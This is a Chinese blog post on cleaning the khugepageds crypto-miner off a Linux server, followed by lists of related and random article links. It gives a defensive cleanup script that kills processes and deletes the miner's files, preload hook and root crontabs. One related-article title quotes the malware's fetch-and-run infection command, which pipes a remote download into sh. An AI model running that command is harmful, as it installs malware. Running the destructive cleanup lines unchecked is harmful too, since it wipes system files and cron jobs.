一.背景

最近公司一台虚拟机被攻击,其中一种挖矿病毒、会伪CPU数、即如果用top命令只能看到一个cpu、并且负载不高、实际上整个负载300%以上,及时定时任务关掉也不起作用。

二.言归正传开始干掉这个麻烦的病毒(脚本如下):

      #关掉定时任务
      service crond stop
      #删除so库
      busybox rm -f /etc/ld.so.preload
      busybox rm -f /usr/local/lib/libcset.so
      chattr -i /etc/ld.so.preload
      busybox rm -f /etc/ld.so.preload
      busybox rm -f /usr/local/lib/libcset.so
      # 清理异常进程
      busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'khugepageds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox rm -f /tmp/kthrotlds
      busybox rm -f /tmp/kintegrityds
      busybox rm -f /tmp/khugepageds
      busybox rm -f /tmp/kpsmouseds
      busybox rm -f /etc/cron.d/tomcat
      busybox rm -f /etc/cron.d/root
      busybox rm -f /var/spool/cron/root
      busybox rm -f /var/spool/cron/crontabs/root
      busybox rm -f /etc/rc.d/init.d/kthrotlds
      busybox rm -f /etc/rc.d/init.d/kpsmouseds
      busybox rm -f /etc/rc.d/init.d/kintegrityds
      busybox rm -f /usr/sbin/kthrotlds
      busybox rm -f /usr/sbin/kintegrityds
      busybox rm -f /usr/sbin/kpsmouseds
      busybox rm -f /etc/init.d/netdns
      busybox rm -f /tmp/ld.so.preload*
      ldconfig
      # 再次清理异常进程
      busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' | busybox xargs kill -9
      busybox ps -ef | busybox grep -v grep | busybox egrep 'khugepageds' | busybox awk '{print $1}' | busybox xargs kill -9


# 清理开机启动项
chkconfig netdns off
chkconfig –del netdns


service crond start
echo "Done, Please reboot!"


      补充:由于近期很多人咨询有wiki,redis,jenkins中招的情况,建议尽快备份数据,重装系统,默认端口修改复杂端口,服务仅供内部使用。
												


											
Linux挖矿病毒 khugepageds详细解决步骤的更多相关文章
	

    
								
  1. "api-ms-win-crt-runtime-l1-1-0.dll 丢失"怎么办?详细解决步骤
		
    api-ms-win-crt-runtime-l1-1-0.dll 丢失 电脑找不到api-ms-win-crt-runtime-l1-1-0.dll文件解决方法: 问题描述: 1.开机提示" ...
    
		
    2. 
						
  2. Windows Azure Virtual Machine (39) 清除Linux挖矿病毒
		
    <Windows Azure Platform 系列文章目录> 1.之前客户遇到了Azure Linux CPU 100%,症状如下: 2.SSH登录到Linux,查看crontab,有从 ...
    
		
    3. 
						
  3. 解决linux挖矿病毒(kdevtmpfsi,sysupdate, networkservice)
		
    突然发现公司测试服务器CPU过高,是这两个sysupdate, networkservice进程,很明显是被挖矿了,记录下来以供参考. 病毒会把一些文件给加i锁或a锁,导致无法修改数据,所以某些操作需 ...
    
		
    4. 
						
  4. 无法将 Ethernet0连接到虚拟网络 VMnet8 以及无法使用桥接的详细解决步骤
		
    前言 首先我们需要明确如下表所示的对应关系: 网络类型 网络适配器名 Bridged   VMnet0 NAT   VMnet8 Host-only      VMnet1   解决"无法将 ...
    
		
    5. 
						
  5. navicat for mysql 连接报错1251详细解决步骤
		
    我的是8.0的版本,因为比较新的mysql采用新的保密方式所以旧的似乎不能用,改密码方式:use mysql:ALTER USER 'root'@'localhost' IDENTIFIED WITH ...
    
		
    6. 
						
  6. 转:进行vivado开发时,Generate Bitstream报错[DRC NSTD-1],详细解决步骤
		
    报错如下 [Drc 23-20] Rule violation (NSTD-1) Unspecified I/O Standard - 4 out of 142 logical ports use I ...
    
		
    7. 
						
  7. Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh)
		
    概要: 一.症状及表现 二.查杀方法 三.病毒分析 四.安全防护 五.参考文章 一.症状及表现 1.CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发 ...
    
		
    8. 
						
  8. qW3xT.2,解决挖矿病毒
		
    在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置. 在晚上一点左右.阿里云给我发短信,告诉我服务器出现紧急安全事件.建议登录云盾-态势感知控制台查看详情和处理. 于 ...
    
		
    9. 
						
  9. Linux Makefile文件编写详细步骤与实践
		
    Linux Makefile文件编写详细步骤与实践 1.makefile概述 Windows环境下IDE会帮你完成makefile文件的编写,但在UNIX环境下你就必须自己写makefile了,会不会 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 使图片自适应div大小
			
    <img src=“” onload="javascript:if(this.height>MaxHeight)this.height=MaxHeight;if(this.wid ...
    
			
    2. 
						
  2. File,FileInfo,FileStream,StreamReader的区别与用法
			
    概括的说,File,FileInfo,FileStream是用于文件 I/O 的类,StreamReader是用于从流读取和写入流的类,使用之前都需using System.IO. 先定义一个TXT文 ...
    
			
    3. 
						
  3. Flask入门之自定义过滤器(匹配器)
			
    1.  动态路由的匹配器? 不知道这种叫啥名,啥用法,暂且叫做匹配器吧. Flask自带的匹配器可以说有四种吧(保守数字,就我学到的) 动态路由本身,可以传任何参数字符串或者数字,如:<user ...
    
			
    4. 
						
  4. 第七章之S5PV210移植到Nandflash
			
    1,之前的操作都是基于SD卡进行运行的,如今在Nandfalsh中运行u-boot.因为s5p_goni.h配置文件没有配置Nand相关文件,所以先配置Nand文件. 在include/configs ...
    
			
    5. 
						
  5. Java中判断是否为空的方法
			
    1.判断字符串或者对象是否为空 首先来看一下工具StringUtils的判断方法: 一种是org.apache.commons.lang3包下的: 另一种是org.springframework.ut ...
    
			
    6. 
						
  6. Spring Data JPA 初体验
			
    一,JPA相关的概念 JPA概述 全称是:JavaPersistence API.是SUN公司推出的一套基于ORM的规范. Hibernate框架中提供了JPA的实现. JPA通过JDK 5.0注解或 ...
    
			
    7. 
						
  7. [Kali_Metasploit]db_connect创建连接时无法连接的解决方案
			
    问题1复现路径: postgresql selected, no connection 第一步: db_connect postgres:toor@127.0.0.1/msfbook 连接成功不需要进 ...
    
			
    8. 
						
  8. Linux内核架构与底层--读书笔记
			
    linux中管道符"|"的作用 命令格式:命令A|命令B,即命令1的正确输出作为命令B的操作对象(下图应用别人的图片) 1. 例如: ps aux | grep "tes ...
    
			
    9. 
						
  9. Spring Cloud Eureka Server高可用注册服务中心的配置
			
    前言 Eureka 作为一个云端负载均衡,本身是一个基于REST的服务,在 Spring Cloud 中用于发现和注册服务. 那么当成千上万个微服务注册到Eureka Server中的时候,Eurek ...
    
			
    10. 
						
  10. redHat linux 修改防火墙设置简略版
			
    1) 重启后生效 开启: chkconfig iptables on 关闭: chkconfig iptables off 2) 即时生效,重启后失效 开启: service iptables sta ...
    
			
    11.